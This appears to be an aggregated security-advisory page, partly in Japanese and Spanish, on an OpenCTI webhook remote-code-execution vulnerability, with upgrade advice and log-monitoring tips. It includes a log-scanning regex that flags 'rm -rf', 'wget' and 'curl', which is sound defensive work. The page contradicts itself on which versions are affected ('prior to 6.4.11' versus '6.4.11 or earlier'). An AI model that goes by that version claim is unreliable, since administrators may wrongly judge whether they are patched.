修正版
6.4.12
6.4.11
CVE-2025-24977 is a remote code execution (RCE) vulnerability affecting OpenCTI, an open cyber threat intelligence (CTI) platform. An attacker with the 'manage customizations' capability can execute arbitrary commands on the underlying infrastructure and access sensitive server-side secrets. This vulnerability impacts versions of OpenCTI prior to 6.4.11 and has been resolved in version 6.4.11.
The impact of CVE-2025-24977 is severe. A successful exploit allows an attacker to gain a root shell within the OpenCTI container, effectively granting them complete control over the underlying infrastructure. This includes the ability to read and modify sensitive data, install malware, and potentially pivot to other systems within the network. The exposure of internal server-side secrets further amplifies the risk, potentially providing credentials or configuration details that can be leveraged for broader attacks. This vulnerability resembles scenarios where container escape vulnerabilities are exploited to compromise the host system.
CVE-2025-24977 was publicly disclosed on May 5, 2025. The vulnerability's criticality (CVSS 9.1) and the potential for significant impact suggest a high probability of exploitation. No public proof-of-concept (PoC) code has been released as of this writing, but the ease of exploitation once gained access to the 'manage customizations' role makes it a likely target for exploitation. It is not currently listed on the CISA KEV catalog.
Organizations utilizing OpenCTI for threat intelligence management are at risk, particularly those with lax access controls or shared hosting environments. Deployment patterns where multiple users have elevated privileges within OpenCTI increase the potential attack surface. Legacy OpenCTI installations that have not been regularly patched are also particularly vulnerable.
• python: Monitor OpenCTI logs for unusual command execution attempts, particularly those originating from webhook requests.
# Example: Check for suspicious commands in OpenCTI logs
import re
with open('opencti.log', 'r') as f:
for line in f:
if re.search(r'command:.*(rm -rf|wget|curl)', line):
print(f'Suspicious command detected: {line}')• linux / server: Use journalctl to filter for errors or warnings related to OpenCTI's webhook processing.
journalctl -u opencti -f --grep 'webhook' --grep 'error'• generic web: Monitor access logs for unusual patterns of requests to OpenCTI webhook endpoints. Look for requests with unexpected parameters or payloads.
disclosure
エクスプロイト状況
EPSS
0.53% (67% パーセンタイル)
CISA SSVC
CVSS ベクトル
The primary mitigation for CVE-2025-24977 is to immediately upgrade OpenCTI to version 6.4.11 or later. If upgrading is not immediately feasible, restrict access to the 'manage customizations' capability to only trusted users. Consider implementing network segmentation to limit the potential blast radius of a successful exploit. While a WAF or proxy cannot directly prevent this vulnerability, it can help detect and block suspicious command execution attempts. After upgrading, verify the fix by attempting to execute a command via the webhooks functionality with a user lacking elevated privileges; the command should be rejected.
Actualice OpenCTI a la versión 6.4.11 o superior. Esta versión corrige la vulnerabilidad de ejecución remota de código y exposición de secretos sensibles a través de webhooks. La actualización evitará que usuarios maliciosos con privilegios de gestión de personalizaciones ejecuten comandos en el servidor y accedan a información confidencial.
脆弱性分析と重要アラートをメールでお届けします。
CVE-2025-24977 is a critical remote code execution vulnerability in OpenCTI versions prior to 6.4.11, allowing attackers with 'manage customizations' to execute commands and access server secrets.
You are affected if you are running OpenCTI version 6.4.11 or earlier. Immediately check your version and upgrade if necessary.
Upgrade OpenCTI to version 6.4.11 or later. Restrict access to the 'manage customizations' role to trusted users only.
While no public exploits are currently known, the vulnerability's severity and ease of exploitation suggest a high probability of future exploitation.
Refer to the official OpenCTI security advisory on their website or GitHub repository for detailed information and updates.
requirements.txt ファイルをアップロードすると、影響の有無を即座にお知らせします。